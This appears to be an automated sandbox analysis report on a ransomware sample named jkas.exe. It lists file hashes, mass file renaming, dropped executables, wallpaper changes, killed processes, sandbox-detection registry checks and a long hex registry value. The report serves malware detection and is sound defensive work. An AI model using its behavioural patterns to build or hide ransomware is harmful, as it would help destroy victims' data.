Analysis
-
max time kernel
150s -
max time network
130s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
01-10-2023 23:46
Static task
static1
Behavioral task
behavioral1
Sample
jkas.exe
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
jkas.exe
Resource
win10v2004-20230915-en
General
-
Target
jkas.exe
-
Size
731KB
-
MD5
724841114acf0bbde3a70c4a7cb54bcc
-
SHA1
1d298b3bf3b2d0c4ccd0615597ba9510e8f180c7
-
SHA256
4c80c0a0d3c211c3aa52b734b4ccb40d50bd0d14b0364fd1160c0c4887df9cf1
-
SHA512
cfd0494247c5dd11dbd9852c54131e90f5a4bf7ee1097c7a8be70bf958eb497c31d94c80ba8759e798c408704d9c89bc606b341af1dafec1d3941d29dba82d90
-
SSDEEP
6144:P3BBCqxV6VsgHTQer7CZ1wwE5P4j8P6pfnFczW0AQxe2gHcb998g4iBCXtzrf78f:P3+A6hXqamQP6pfFCGVu8g4sCXtzr7O
Malware Config
Signatures
-
Renames multiple (3380) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 2 IoCs
pid Process 1772 RansomBy Lilteca.exe 1816 svcran.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File created F:\$RECYCLE.BIN\S-1-5-21-1894964180-3551943068-3090682958-1000\desktop.ini svcran.exe File created C:\$Recycle.Bin\S-1-5-21-1894964180-3551943068-3090682958-1000\desktop.ini svcran.exe File created C:\Program Files\desktop.ini svcran.exe File created C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini svcran.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Back.jpg" RansomBy Lilteca.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\.lastModified svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ul-phn.xrm-ms svcran.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar svcran.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\psfont.properties.ja svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-phn.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-pl.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Grace-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ul-phn.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-pl.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-pl.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-pl.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ppd.xrm-ms svcran.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert\insertbase.xml svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ul-phn.xrm-ms svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml svcran.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt svcran.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-localization-l1-2-0.dll svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Retail-ul-phn.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp4-ppd.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_KMS_Client-ul.xrm-ms svcran.exe File created C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\core.jar svcran.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansRegular.ttf svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms svcran.exe File created C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png svcran.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-pl.xrm-ms svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496937509.profile.gz svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ppd.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt svcran.exe File created C:\Program Files\Common Files\microsoft shared\ink\de-DE\micaut.dll.mui svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ppd.xrm-ms svcran.exe File opened for modification C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOLoader.dll svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-ms svcran.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-pl.xrm-ms svcran.exe File created C:\Program Files\Common Files\microsoft shared\ink\en-US\InputPersonalization.exe.mui svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496939244.profile.gz svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif svcran.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml svcran.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\RansomBy Lilteca.exe jkas.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri explorer.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri SearchUI.exe File created C:\Windows\rescache\_merged\4032412167\2900507189.pri explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID explorer.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Kills process with taskkill 6 IoCs
pid Process 4292 taskkill.exe 2856 taskkill.exe 740 taskkill.exe 1864 taskkill.exe 4124 taskkill.exe 3288 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000\Software\Microsoft\Internet Explorer\GPU SearchUI.exe -
Modifies registry class 29 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133392445365820896" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1894964180-3551943068-3090682958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e7070a004100720067006a006200650078002000200032000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000009eb880a5c1f4d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e7070a004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000b7876ea4c1f4d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e70709004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc76000000000000000000000000458e2f34b9e7d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000